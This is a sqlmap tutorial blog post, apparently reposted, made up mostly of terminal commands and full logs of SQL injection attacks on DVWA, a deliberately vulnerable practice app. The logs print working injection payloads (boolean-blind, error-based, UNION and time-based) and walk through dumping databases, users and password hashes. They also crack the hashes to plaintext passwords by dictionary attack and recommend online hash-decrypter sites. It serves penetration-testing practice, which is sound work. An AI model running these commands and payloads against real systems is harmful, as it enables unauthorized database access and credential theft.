sql injection – sqlmap

本文介绍如何使用SQLMap这一开源渗透测试工具,自动化检测并利用SQL注入漏洞接管数据库服务器。涵盖获取数据库版本、名称、表名及列名等操作,并演示了如何通过SQLMap抓取cookie、查找用户及密码。

摘要生成于 C知道 ,由 DeepSeek-R1 满血版支持, 前往体验 >

sqlmap is an open source penetration testing tool that automates the process of detecting and exploiting SQL injection flaws and taking over of database servers. It comes with a powerful detection engine, many niche features for the ultimate penetration tester and a broad range of switches lasting from database fingerprinting, over data fetching from the database, to accessing the underlying file system and executing commands on the operating system via out-of-band connections.

backtrack 5r1

/pentest/database/sqlmap

To find SQL database version
root@bt:/pentest/database/sqlmap# ./sqlmap.py -u url

To Find SQL database Name
root@bt:/pentest/database/sqlmap# ./sqlmap.py -u url --dbs

To find database table names
root@bt:/pentest/database/sqlmap# ./sqlmap.py -u url --tables -D database-name

To find database columns
root@bt:/pentest/database/sqlmap# ./sqlmap.py -u url --column -T table-name -D database-name

To see the data from database
root@bt:/pentest/database/sqlmap# ./sqlmap.py -u url --dump --column -T table-name -D database-name

grab cookie from tamperdata firefox plugin

root@bt:/pentest/database/sqlmap#./sqlmap.py -u 'http://IP-Address/?id=1&Submit=Submit#' --cookie='PHPSESSID=a93ts3jmfs2ar5asvhh69k6un1; security=low' --string="Surname" --dbs

sqlmap/1.0-dev (r4009) – automatic SQL injection and database takeover tool

http://sqlmap.sourceforge.net

[!] Legal Disclaimer: usage of sqlmap for attacking web servers without prior mutual consent can be considered as an illegal activity. it is the final user’s responsibility to obey all applicable local, state and federal laws. authors assume no liability and are not responsible for any misuse or damage caused by this program.

[*] starting at: 17:05:51

[17:05:52] [INFO] using ‘/pentest/database/sqlmap/output/IP-Address/session’ as session file
[17:05:52] [INFO] resuming injection data from session file
[17:05:52] [INFO] resuming back-end DBMS ‘mysql 5.0′ from session file
[17:05:52] [INFO] testing connection to the target url
[17:05:52] [INFO] testing if the provided string is within the target URL page content
sqlmap identified the following injection points with a total of 0 HTTP(s) requests:

Place: GET
Parameter: id
Type: boolean-based blind
Title: AND boolean-based blind – WHERE or HAVING clause
Payload: id=1′ AND 8761=8761 AND ‘FczA’=’FczA&Submit=Submit

Type: error-based
Title: MySQL >= 5.0 AND error-based – WHERE or HAVING clause
Payload: id=1′ AND (SELECT 45 FROM(SELECT COUNT(*),CONCAT(CHAR(58,106,118,105,58),(SELECT (CASE WHEN (45=45) THEN 1 ELSE 0 END)),CHAR(58,113,98,100,58),FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a) AND ‘COXA’=’COXA&Submit=Submit

Type: UNION query
Title: MySQL UNION query (NULL) – 1 to 10 columns
Payload: id=1′ UNION ALL SELECT NULL, CONCAT(CHAR(58,106,118,105,58),IFNULL(CAST(CHAR(117,73,80,113,73,74,111,75,85,72) AS CHAR),CHAR(32)),CHAR(58,113,98,100,58))# AND ‘kmcR’=’kmcR&Submit=Submit

Type: AND/OR time-based blind
Title: MySQL > 5.0.11 AND time-based blind
Payload: id=1′ AND SLEEP(5) AND ‘qxrK’=’qxrK&Submit=Submit

[17:05:52] [INFO] manual usage of GET payloads requires url encoding
[17:05:52] [INFO] the back-end DBMS is MySQL
web server operating system: Windows
web application technology: Apache 2.2.21, PHP 5.3.8
back-end DBMS: MySQL 5.0
[17:05:52] [INFO] fetching database names
[17:05:52] [INFO] read from file ‘/pentest/database/sqlmap/output/IP-Address/session’: information_schema, cdcol,  mysql, performance_schema, phpmyadmin, test, webauth
available databases [8]:
[*] cdcol
[*] information_schema
[*] mysql
[*] performance_schema
[*] phpmyadmin
[*] test
[*] webauth

[17:05:52] [INFO] Fetched data logged to text files under ‘/pentest/database/sqlmap/output/IP-Address’

./sqlmap.py -u ‘http://IP-Address/?id=1&Submit=Submit#’ –cookie=’PHPSESSID=a93ts3jmfs2ar5asvhh69k6un1; security=low’ –string=”Surname”  –users –password

dojo@dojo-vm:~/tools/sqlmap$ ./sqlmap.py -u 'http://127.0.0.1/dvwa/vulnerabilities/sqli/?id=2&Submit=Submit' --dbs --users --passwords

sqlmap/0.9-dev - automatic SQL injection and database takeover tool

http://sqlmap.sourceforge.net

[*] starting at: 11:07:20

[11:07:20] [INFO] using '/home/dojo/tools/sqlmap/output/127.0.0.1/session' as session file
[11:07:20] [INFO] resuming string match 'Surname' from session file
you did not provide any string to match. Do you want to use the resumed string to be matched in page when the query is valid? [Y/n]
[11:07:21] [INFO] resuming injection point 'GET' from session file
[11:07:21] [INFO] resuming injection parameter 'id' from session file
[11:07:21] [INFO] resuming injection type 'stringsingle' from session file
[11:07:21] [INFO] resuming 0 number of parenthesis from session file
[11:07:21] [INFO] resuming back-end DBMS 'mysql 5' from session file
[11:07:21] [INFO] testing connection to the target url
sqlmap got a 302 redirect to ../../login.php - What target address do you want to use from now on? http://127.0.0.1:80/dvwa/vulnerabilities/sqli/ (default) or provide another target address based also on the redirection got from the application

>
[11:07:22] [INFO] testing for parenthesis on injectable parameter
[11:07:22] [INFO] the back-end DBMS is MySQL
web server operating system: Linux Ubuntu
web application technology: PHP 5.3.2, Apache 2.2.14
back-end DBMS: MySQL 5
[11:07:22] [INFO] fetching database users
[11:07:22] [INFO] fetching number of database users
[11:07:22] [INFO] read from file '/home/dojo/tools/sqlmap/output/127.0.0.1/session': 4
[11:07:22] [INFO] read from file '/home/dojo/tools/sqlmap/output/127.0.0.1/session': 'root'@'localhost'
[11:07:22] [INFO] read from file '/home/dojo/tools/sqlmap/output/127.0.0.1/session': 'root'@'dojo-vm'
[11:07:22] [INFO] read from file '/home/dojo/tools/sqlmap/output/127.0.0.1/session': 'root'@'127.0.0.1'
[11:07:22] [INFO] read from file '/home/dojo/tools/sqlmap/output/127.0.0.1/session': 'debian-sys-maint'@'localhost'
database management system users [4]:
[*] 'debian-sys-maint'@'localhost'
[*] 'root'@'127.0.0.1'
[*] 'root'@'dojo-vm'
[*] 'root'@'localhost'

[11:07:22] [INFO] fetching database users password hashes
[11:07:22] [INFO] fetching number of password hashes for user 'root'
[11:07:22] [INFO] read from file '/home/dojo/tools/sqlmap/output/127.0.0.1/session': 1
[11:07:22] [INFO] fetching password hashes for user 'root'
[11:07:22] [INFO] read from file '/home/dojo/tools/sqlmap/output/127.0.0.1/session': *263027ECC84AA7B81EA86B0EBECAFE20BC8804FC
[11:07:22] [INFO] fetching number of password hashes for user 'debian-sys-maint'
[11:07:22] [INFO] read from file '/home/dojo/tools/sqlmap/output/127.0.0.1/session': 1
[11:07:22] [INFO] fetching password hashes for user 'debian-sys-maint'
[11:07:22] [INFO] read from file '/home/dojo/tools/sqlmap/output/127.0.0.1/session': *F50CAE339AF9BCEAD8D81B0D4E743C841415E925
database management system users password hashes:
[*] debian-sys-maint [1]:
password hash: *F50CAE339AF9BCEAD8D81B0D4E743C841415E925
[*] root [1]:
password hash: *263027ECC84AA7B81EA86B0EBECAFE20BC8804FC

[11:07:22] [INFO] fetching database names
[11:07:22] [INFO] fetching number of databases
[11:07:22] [INFO] read from file '/home/dojo/tools/sqlmap/output/127.0.0.1/session': 4
[11:07:22] [INFO] read from file '/home/dojo/tools/sqlmap/output/127.0.0.1/session': information_schema
[11:07:22] [INFO] read from file '/home/dojo/tools/sqlmap/output/127.0.0.1/session': dvwa
[11:07:22] [INFO] read from file '/home/dojo/tools/sqlmap/output/127.0.0.1/session': mysql
[11:07:22] [INFO] read from file '/home/dojo/tools/sqlmap/output/127.0.0.1/session': w3af_test
available databases [4]:
[*] dvwa
[*] information_schema
[*] mysql
[*] w3af_test

[11:07:22] [INFO] Fetched data logged to text files under '/home/dojo/tools/sqlmap/output/127.0.0.1'

[*] shutting down at: 11:07:22

dojo@dojo-vm:~/tools/sqlmap$

————————————————————–
updates
————————————————————–
Find database

Used tamperdata firefox plugin to get Cookie as bellow

Cookie=security=low; _session_id=f4cd3cc878720ceedcc985be580901d4; PHPSESSID=jpcqujj4tl04l0hfsb7c4rmrn3

reload the login page so get clean url /dvwa/vulnerabilities/sqli/?id=&Submit=Submit#

root@bt:/pentest/database/sqlmap# ./sqlmap.py -u "http://10.255.245.136/dvwa/vulnerabilities/sqli/?id=&Submit=Submit#" --cookie "security=low; PHPSESSID=jpcqujj4tl04l0hfsb7c4rmrn3" --dbs --users --passwords

sqlmap/1.0-dev (r4009) - automatic SQL injection and database takeover tool

http://sqlmap.sourceforge.net

[!] Legal Disclaimer: usage of sqlmap for attacking web servers without prior mutual consent can be considered as an illegal activity. it is the final user's responsibility to obey all applicable local, state and federal laws. authors assume no liability and are not responsible for any misuse or damage caused by this program.

[*] starting at: 10:14:04

[10:14:04] [INFO] using '/pentest/database/sqlmap/output/10.255.245.136/session' as session file
[10:14:04] [INFO] resuming injection data from session file
[10:14:04] [INFO] resuming back-end DBMS 'mysql 5.0' from session file
[10:14:04] [INFO] testing connection to the target url
sqlmap identified the following injection points with a total of 0 HTTP(s) requests:
---
Place: GET
Parameter: id
Type: error-based
Title: MySQL >= 5.0 AND error-based - WHERE or HAVING clause
Payload: id=%1' AND (SELECT 251 FROM(SELECT COUNT(*),CONCAT(CHAR(58,117,112,105,58),(SELECT (CASE WHEN (251=251) THEN 1 ELSE 0 END)),CHAR(58,118,116,104,58),FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a) AND 'ycDo'='ycDo&Submit=Submit

Type: UNION query
Title: MySQL UNION query (NULL) - 1 to 10 columns
Payload: id=%1' UNION ALL SELECT CONCAT(CHAR(58,117,112,105,58),IFNULL(CAST(CHAR(72,70,75,104,73,81,81,83,76,117) AS CHAR),CHAR(32)),CHAR(58,118,116,104,58)), NULL# AND 'kwOP'='kwOP&Submit=Submit
---

[10:14:04] [INFO] manual usage of GET payloads requires url encoding
[10:14:04] [INFO] the back-end DBMS is MySQL
web server operating system: Linux Ubuntu 10.04 (Lucid Lynx)
web application technology: PHP 5.3.2, Apache 2.2.14
back-end DBMS: MySQL 5.0
[10:14:04] [INFO] fetching database users
[10:14:04] [INFO] read from file '/pentest/database/sqlmap/output/10.255.245.136/session': 'root'@'localhost', 'root'@'localhost', 'root'@'localhost', 'root'@'localhost', 'root'@'localhost', 'root'@'localhost', 'root'@'localhost', 'root'@'localhost', 'root'@'localhost', 'root'@'localhost', 'root'@'localhost', 'root'@'localhost', 'root'@'localhost', 'root'@'localhost', 'root'@'localhost', 'root'@'localhost', 'root'@'localhost', 'root'@'localhost', 'root'@'localhost', 'root'@'localhost', 'root'@'localhost', 'root'@'localhost', 'root'@'localhost', 'root'@'localhost', 'root'@'localhost', 'root'@'localhost', 'root'@'localhost', 'root'@'dojo-vm', 'root'@'dojo-vm', 'root'@'dojo-vm', 'root'@'dojo-vm', 'root'@'dojo-vm', 'root'@'dojo-vm', 'root'@'dojo-vm', 'root'@'dojo-vm', 'root'@'dojo-vm', 'root'@'dojo-vm', 'root'@'dojo-vm', 'root'@'dojo-vm', 'root'@'dojo-vm', 'root'@'dojo-vm', 'root'@'dojo-vm', 'root'@'dojo-vm', 'root'@'dojo-vm', 'root'@'dojo-vm', 'root'@'dojo-vm', 'root'@'dojo-vm', 'root'@'dojo-vm', 'root'@'dojo-vm', 'root'@'dojo-vm', 'root'@'dojo-vm', 'root'@'dojo-vm', 'root'@'dojo-vm', 'root'@'dojo-vm', 'root'@'127.0.0.1', 'root'@'127.0.0.1', 'root'@'127.0.0.1', 'root'@'127.0.0.1', 'root'@'127.0.0.1', 'root'@'127.0.0.1', 'root'@'127.0.0.1', 'root'@'127.0.0.1', 'root'@'127.0.0.1', 'root'@'127.0.0.1', 'root'@'127.0.0.1', 'root'@'127.0.0.1', 'root'@'127.0.0.1', 'root'@'127.0.0.1', 'root'@'127.0.0.1', 'root'@'127.0.0.1', 'root'@'127.0.0.1', 'root'@'127.0.0.1', 'root'@'127.0.0.1', 'root'@'127.0.0.1', 'root'@'127.0.0.1', 'root'@'127.0.0.1', 'root'@'127.0.0.1', 'root'@'127.0.0.1', 'root'@'127.0.0.1', 'root'@'127.0.0.1', 'root'@'127.0.0.1', 'debian-sys-maint'@'localhost', 'debian-sys-maint'@'localhost', 'debian-sys-maint'@'localhost', 'debian-sys-maint'@'localhost', 'debian-sys-maint'@'localhost', 'debian-sys-maint'@'localhost', 'debian-sys-maint'@'localhost', 'debian-sys-maint'@'localhost', 'debian-sys-maint'@'localhost', 'debian-sys-maint'@'localhost', 'debian-sys-maint'@'localhost', 'debian-sys-maint'@'localhost', 'debian-sys-maint'@'localhost', 'debian-sys-maint'@'localhost', 'debian-sys-maint'@'localhost', 'debian-sys-maint'@'localhost', 'debian-sys-maint'@'localhost', 'debian-sys-maint'@'localhost', 'debian-sys-maint'@'localhost', 'debian-sys-maint'@'localhost', 'debian-sys-maint'@'localhost', 'debian-sys-maint'@'localhost', 'debian-sys-maint'@'localhost', 'debian-sys-maint'@'localhost', 'debian-sys-maint'@'localhost', 'debian-sys-maint'@'localhost', 'debian-sys-maint'@'localhost'
database management system users [4]:
[*] 'debian-sys-maint'@'localhost'
[*] 'root'@'127.0.0.1'
[*] 'root'@'dojo-vm'
[*] 'root'@'localhost'

[10:14:05] [INFO] fetching database users password hashes
do you want to use dictionary attack on retrieved password hashes? [Y/n/q] y
[10:14:10] [INFO] using hash method: 'mysql_passwd'
what's the dictionary's location? [/pentest/database/sqlmap/txt/wordlist.txt]
[10:14:16] [INFO] loading dictionary from: '/pentest/database/sqlmap/txt/wordlist.txt'
do you want to use common password suffixes? (slow!) [y/N] n
[10:14:22] [INFO] starting dictionary attack (mysql_passwd)
[10:14:24] [WARNING] no clear password(s) found
database management system users password hashes:
[*] debian-sys-maint [1]:
password hash: *1457CHANGED263027ECC84AA1457CHANGED26302
[*] root [1]:
password hash: *1457CHANGED263027ECC84AA1457CHANGED26302

[10:14:24] [INFO] fetching database names
[10:14:24] [INFO] read from file '/pentest/database/sqlmap/output/10.255.245.136/session': information_schema, dvwa, mysql, w3af_test
available databases [4]:
[*] dvwa
[*] information_schema
[*] mysql
[*] w3af_test

[10:14:24] [INFO] Fetched data logged to text files under '/pentest/database/sqlmap/output/10.255.245.136'

[*] shutting down at: 10:14:24

————————————————————–
Find tables

root@bt:/pentest/database/sqlmap# ./sqlmap.py -u "http://10.255.245.136/dvwa/vulnerabilities/sqli/?id=&Submit=Submit#" --cookie "security=low; PHPSESSID=jpcqujj4tl04l0hfsb7c4rmrn3" -D dvwa --tables

sqlmap/1.0-dev (r4009) - automatic SQL injection and database takeover tool

http://sqlmap.sourceforge.net

[!] Legal Disclaimer: usage of sqlmap for attacking web servers without prior mutual consent can be considered as an illegal activity. it is the final user's responsibility to obey all applicable local, state and federal laws. authors assume no liability and are not responsible for any misuse or damage caused by this program.

[*] starting at: 10:27:40

[10:27:40] [INFO] using '/pentest/database/sqlmap/output/10.255.245.136/session' as session file
[10:27:40] [INFO] resuming injection data from session file
[10:27:40] [INFO] resuming back-end DBMS 'mysql 5.0' from session file
[10:27:40] [INFO] testing connection to the target url
sqlmap identified the following injection points with a total of 0 HTTP(s) requests:
---
Place: GET
Parameter: id
Type: error-based
Title: MySQL >= 5.0 AND error-based - WHERE or HAVING clause
Payload: id=%1' AND (SELECT 251 FROM(SELECT COUNT(*),CONCAT(CHAR(58,117,112,105,58),(SELECT (CASE WHEN (251=251) THEN 1 ELSE 0 END)),CHAR(58,118,116,104,58),FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a) AND 'ycDo'='ycDo&Submit=Submit

Type: UNION query
Title: MySQL UNION query (NULL) - 1 to 10 columns
Payload: id=%1' UNION ALL SELECT CONCAT(CHAR(58,117,112,105,58),IFNULL(CAST(CHAR(72,70,75,104,73,81,81,83,76,117) AS CHAR),CHAR(32)),CHAR(58,118,116,104,58)), NULL# AND 'kwOP'='kwOP&Submit=Submit
---

[10:27:40] [INFO] manual usage of GET payloads requires url encoding
[10:27:40] [INFO] the back-end DBMS is MySQL
web server operating system: Linux Ubuntu 10.04 (Lucid Lynx)
web application technology: PHP 5.3.2, Apache 2.2.14
back-end DBMS: MySQL 5.0
[10:27:40] [INFO] fetching tables for database: dvwa
[10:27:40] [INFO] read from file '/pentest/database/sqlmap/output/10.255.245.136/session': dvwa, guestbook, dvwa, users
Database: dvwa
[2 tables]
+-----------+
| guestbook |
| users |
+-----------+

[10:27:40] [INFO] Fetched data logged to text files under '/pentest/database/sqlmap/output/10.255.245.136'

[*] shutting down at: 10:27:40

--------------------------------------------------------------
Find users

root@bt:/pentest/database/sqlmap# ./sqlmap.py -u "http://10.255.245.136/dvwa/vulnerabilities/sqli/?id=&Submit=Submit#" --cookie "security=low; PHPSESSID=jpcqujj4tl04l0hfsb7c4rmrn3" -D dvwa --users

sqlmap/1.0-dev (r4009) - automatic SQL injection and database takeover tool

http://sqlmap.sourceforge.net

[!] Legal Disclaimer: usage of sqlmap for attacking web servers without prior mutual consent can be considered as an illegal activity. it is the final user's responsibility to obey all applicable local, state and federal laws. authors assume no liability and are not responsible for any misuse or damage caused by this program.

[*] starting at: 10:28:45

[10:28:45] [INFO] using '/pentest/database/sqlmap/output/10.255.245.136/session' as session file
[10:28:45] [INFO] resuming injection data from session file
[10:28:45] [INFO] resuming back-end DBMS 'mysql 5.0' from session file
[10:28:45] [INFO] testing connection to the target url
sqlmap identified the following injection points with a total of 0 HTTP(s) requests:
---
Place: GET
Parameter: id
Type: error-based
Title: MySQL >= 5.0 AND error-based - WHERE or HAVING clause
Payload: id=%1' AND (SELECT 251 FROM(SELECT COUNT(*),CONCAT(CHAR(58,117,112,105,58),(SELECT (CASE WHEN (251=251) THEN 1 ELSE 0 END)),CHAR(58,118,116,104,58),FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a) AND 'ycDo'='ycDo&Submit=Submit

Type: UNION query
Title: MySQL UNION query (NULL) - 1 to 10 columns
Payload: id=%1' UNION ALL SELECT CONCAT(CHAR(58,117,112,105,58),IFNULL(CAST(CHAR(72,70,75,104,73,81,81,83,76,117) AS CHAR),CHAR(32)),CHAR(58,118,116,104,58)), NULL# AND 'kwOP'='kwOP&Submit=Submit
---

[10:28:45] [INFO] manual usage of GET payloads requires url encoding
[10:28:45] [INFO] the back-end DBMS is MySQL
web server operating system: Linux Ubuntu 10.04 (Lucid Lynx)
web application technology: PHP 5.3.2, Apache 2.2.14
back-end DBMS: MySQL 5.0
[10:28:45] [INFO] fetching database users
[10:28:45] [INFO] read from file '/pentest/database/sqlmap/output/10.255.245.136/session': 'root'@'localhost', 'root'@'localhost', 'root'@'localhost', 'root'@'localhost', 'root'@'localhost', 'root'@'localhost', 'root'@'localhost', 'root'@'localhost', 'root'@'localhost', 'root'@'localhost', 'root'@'localhost', 'root'@'localhost', 'root'@'localhost', 'root'@'localhost', 'root'@'localhost', 'root'@'localhost', 'root'@'localhost', 'root'@'localhost', 'root'@'localhost', 'root'@'localhost', 'root'@'localhost', 'root'@'localhost', 'root'@'localhost', 'root'@'localhost', 'root'@'localhost', 'root'@'localhost', 'root'@'localhost', 'root'@'dojo-vm', 'root'@'dojo-vm', 'root'@'dojo-vm', 'root'@'dojo-vm', 'root'@'dojo-vm', 'root'@'dojo-vm', 'root'@'dojo-vm', 'root'@'dojo-vm', 'root'@'dojo-vm', 'root'@'dojo-vm', 'root'@'dojo-vm', 'root'@'dojo-vm', 'root'@'dojo-vm', 'root'@'dojo-vm', 'root'@'dojo-vm', 'root'@'dojo-vm', 'root'@'dojo-vm', 'root'@'dojo-vm', 'root'@'dojo-vm', 'root'@'dojo-vm', 'root'@'dojo-vm', 'root'@'dojo-vm', 'root'@'dojo-vm', 'root'@'dojo-vm', 'root'@'dojo-vm', 'root'@'dojo-vm', 'root'@'dojo-vm', 'root'@'127.0.0.1', 'root'@'127.0.0.1', 'root'@'127.0.0.1', 'root'@'127.0.0.1', 'root'@'127.0.0.1', 'root'@'127.0.0.1', 'root'@'127.0.0.1', 'root'@'127.0.0.1', 'root'@'127.0.0.1', 'root'@'127.0.0.1', 'root'@'127.0.0.1', 'root'@'127.0.0.1', 'root'@'127.0.0.1', 'root'@'127.0.0.1', 'root'@'127.0.0.1', 'root'@'127.0.0.1', 'root'@'127.0.0.1', 'root'@'127.0.0.1', 'root'@'127.0.0.1', 'root'@'127.0.0.1', 'root'@'127.0.0.1', 'root'@'127.0.0.1', 'root'@'127.0.0.1', 'root'@'127.0.0.1', 'root'@'127.0.0.1', 'root'@'127.0.0.1', 'root'@'127.0.0.1', 'debian-sys-maint'@'localhost', 'debian-sys-maint'@'localhost', 'debian-sys-maint'@'localhost', 'debian-sys-maint'@'localhost', 'debian-sys-maint'@'localhost', 'debian-sys-maint'@'localhost', 'debian-sys-maint'@'localhost', 'debian-sys-maint'@'localhost', 'debian-sys-maint'@'localhost', 'debian-sys-maint'@'localhost', 'debian-sys-maint'@'localhost', 'debian-sys-maint'@'localhost', 'debian-sys-maint'@'localhost', 'debian-sys-maint'@'localhost', 'debian-sys-maint'@'localhost', 'debian-sys-maint'@'localhost', 'debian-sys-maint'@'localhost', 'debian-sys-maint'@'localhost', 'debian-sys-maint'@'localhost', 'debian-sys-maint'@'localhost', 'debian-sys-maint'@'localhost', 'debian-sys-maint'@'localhost', 'debian-sys-maint'@'localhost', 'debian-sys-maint'@'localhost', 'debian-sys-maint'@'localhost', 'debian-sys-maint'@'localhost', 'debian-sys-maint'@'localhost'
database management system users [4]:
[*] 'debian-sys-maint'@'localhost'
[*] 'root'@'127.0.0.1'
[*] 'root'@'dojo-vm'
[*] 'root'@'localhost'

[10:28:45] [INFO] Fetched data logged to text files under '/pentest/database/sqlmap/output/10.255.245.136'

[*] shutting down at: 10:28:45

--------------------------------------------------------------
Find passwords

root@bt:/pentest/database/sqlmap# ./sqlmap.py -u "http://10.255.245.136/dvwa/vulnerabilities/sqli/?id=&Submit=Submit#" --cookie "security=low; PHPSESSID=jpcqujj4tl04l0hfsb7c4rmrn3" -D dvwa -T users -C password --dump

sqlmap/1.0-dev (r4009) - automatic SQL injection and database takeover tool

http://sqlmap.sourceforge.net

[!] Legal Disclaimer: usage of sqlmap for attacking web servers without prior mutual consent can be considered as an illegal activity. it is the final user's responsibility to obey all applicable local, state and federal laws. authors assume no liability and are not responsible for any misuse or damage caused by this program.

[*] starting at: 10:24:19

[10:24:20] [INFO] using '/pentest/database/sqlmap/output/10.255.245.136/session' as session file
[10:24:20] [INFO] resuming injection data from session file
[10:24:20] [INFO] resuming back-end DBMS 'mysql 5.0' from session file
[10:24:20] [INFO] testing connection to the target url
sqlmap identified the following injection points with a total of 0 HTTP(s) requests:
---
Place: GET
Parameter: id
Type: error-based
Title: MySQL >= 5.0 AND error-based - WHERE or HAVING clause
Payload: id=%1' AND (SELECT 251 FROM(SELECT COUNT(*),CONCAT(CHAR(58,117,112,105,58),(SELECT (CASE WHEN (251=251) THEN 1 ELSE 0 END)),CHAR(58,118,116,104,58),FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a) AND 'ycDo'='ycDo&Submit=Submit

Type: UNION query
Title: MySQL UNION query (NULL) - 1 to 10 columns
Payload: id=%1' UNION ALL SELECT CONCAT(CHAR(58,117,112,105,58),IFNULL(CAST(CHAR(72,70,75,104,73,81,81,83,76,117) AS CHAR),CHAR(32)),CHAR(58,118,116,104,58)), NULL# AND 'kwOP'='kwOP&Submit=Submit
---

[10:24:20] [INFO] manual usage of GET payloads requires url encoding
[10:24:20] [INFO] the back-end DBMS is MySQL
web server operating system: Linux Ubuntu 10.04 (Lucid Lynx)
web application technology: PHP 5.3.2, Apache 2.2.14
back-end DBMS: MySQL 5.0
do you want to use LIKE operator to retrieve column names similar to the ones provided with the -C option? [Y/n] y
[10:24:22] [INFO] fetching columns LIKE 'password' for table 'users' on database 'dvwa'
[10:24:22] [INFO] fetching column(s) 'password' entries for table 'users' on database 'dvwa'
recognized possible password hash values. do you want to use dictionary attack on retrieved table items? [Y/n/q] y
[10:24:24] [INFO] using hash method: 'md5_generic_passwd'
what's the dictionary's location? [/pentest/database/sqlmap/txt/wordlist.txt]
[10:24:26] [INFO] loading dictionary from: '/pentest/database/sqlmap/txt/wordlist.txt'
do you want to use common password suffixes? (slow!) [y/N] y
[10:24:28] [INFO] starting dictionary attack (md5_generic_passwd)
[10:24:28] [INFO] found: 'abc123' for hash: 'e99a18c428cb38d5f260853678922e03'
[10:24:29] [INFO] found: 'charley' for hash: '8d3533d75ae2c3966d7e0d4fcc69216b'
[10:24:29] [INFO] found: 'letmein' for hash: '0d107d09f5bbe40cade3de5c71e9e9b7'
[10:24:30] [INFO] found: 'password' for hash: '5f4dcc3b5aa765d61d8327deb882cf99'
Database: dvwa
Table: users
[4 entries]
+---------------------------------------------+
| password |
+---------------------------------------------+
| 0d107d09f5bbe40cade3de5c71e9e9b7 (letmein) |
| 8d3533d75ae2c3966d7e0d4fcc69216b (charley) |
| e99a18c428cb38d5f260853678922e03 (abc123) |
| 5f4dcc3b5aa765d61d8327deb882cf99 (password) |
+---------------------------------------------+

[10:24:30] [INFO] Table 'dvwa.users' dumped to CSV file '/pentest/database/sqlmap/output/10.255.245.136/dump/dvwa/users.csv'
[10:24:30] [INFO] Fetched data logged to text files under '/pentest/database/sqlmap/output/10.255.245.136'

[*] shutting down at: 10:24:30

http://www.myexploit.wordpress.com/web-application-webscarab/

————————————————————–

/pentest/web/webscarab

root@bt:/pentest/web/webscarab# java -jar webscarab-one-20110329-1330.jar

root@bt:/pentest/database/sqlmap# ./sqlmap.py -l /tmp/webscarab1111.tmp/conversations

root@bt:/pentest/database/sqlmap# ./sqlmap.py -l /tmp/webscarab0087.tmp/conversations --users --passwords --tables --dbs --level=2 --risk=1 --scope=^IP-Address$

[02:35:19] [WARNING] no clear password(s) found
database management system users password hashes:

[*] root [1]:
password hash: *263027ECC84AA7B81EA86B0EBECAFE20BC8804FC

Note you can use online decrypter sites

MySQL4.1 uses sha1

http://www.md5decrypter.co.uk/sha1-decrypt.aspx

263027ecc84aa7b81ea86b0ebecafe20bc8804fc = dojo

[02:35:19] [INFO] fetching database names
[02:35:19] [INFO] read from file '/pentest/database/sqlmap/output/IP-Address/session': information_schema, dvwa, mysql, w3af_test
available databases [4]:
[*] dvwa
[*] information_schema
[*] mysql
[*] w3af_test

[02:35:19] [INFO] fetching tables for databases: w3af_test, dvwa, information_schema, mysql
Database: w3af_test
[2 tables]
+---------------------------------------+
| customers |
| users |
+---------------------------------------+

Database: dvwa
[2 tables]
+---------------------------------------+
| guestbook |
| users |
+---------------------------------------+

[02:35:20] [INFO] fetching columns for table 'users' on database 'dvwa'
Database: dvwa
Table: users
[6 columns]
+------------+-------------+
| Column | Type |
+------------+-------------+
| avatar | varchar(70) |
| first_name | varchar(15) |
| last_name | varchar(15) |
| password | varchar(32) |
| user | varchar(15) |
| user_id | int(6) |
+------------+-------------+

Enumeration:
These options can be used to enumerate the back-end database
management system information, structure and data contained in the
tables. Moreover you can run your own SQL statements.
-b, --banner Retrieve DBMS banner
--current-user Retrieve DBMS current user
--current-db Retrieve DBMS current database
--is-dba Detect if the DBMS current user is DBA
--users Enumerate DBMS users
--passwords Enumerate DBMS users password hashes
--privileges Enumerate DBMS users privileges
--roles Enumerate DBMS users roles
--dbs Enumerate DBMS databases
--tables Enumerate DBMS database tables
--columns Enumerate DBMS database table columns
--dump Dump DBMS database table entries
--dump-all Dump all DBMS databases tables entries
--search Search column(s), table(s) and/or database name(s)
-D DB DBMS database to enumerate
-T TBL DBMS database table to enumerate
-C COL DBMS database table column to enumerate
-U USER DBMS user to enumerate
--exclude-sysdbs Exclude DBMS system databases when enumerating tables
--start=LIMITSTART First query output entry to retrieve
--stop=LIMITSTOP Last query output entry to retrieve
--first=FIRSTCHAR First query output word character to retrieve
--last=LASTCHAR Last query output word character to retrieve
--sql-query=QUERY SQL statement to be executed
--sql-shell Prompt for an interactive SQL shell

评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值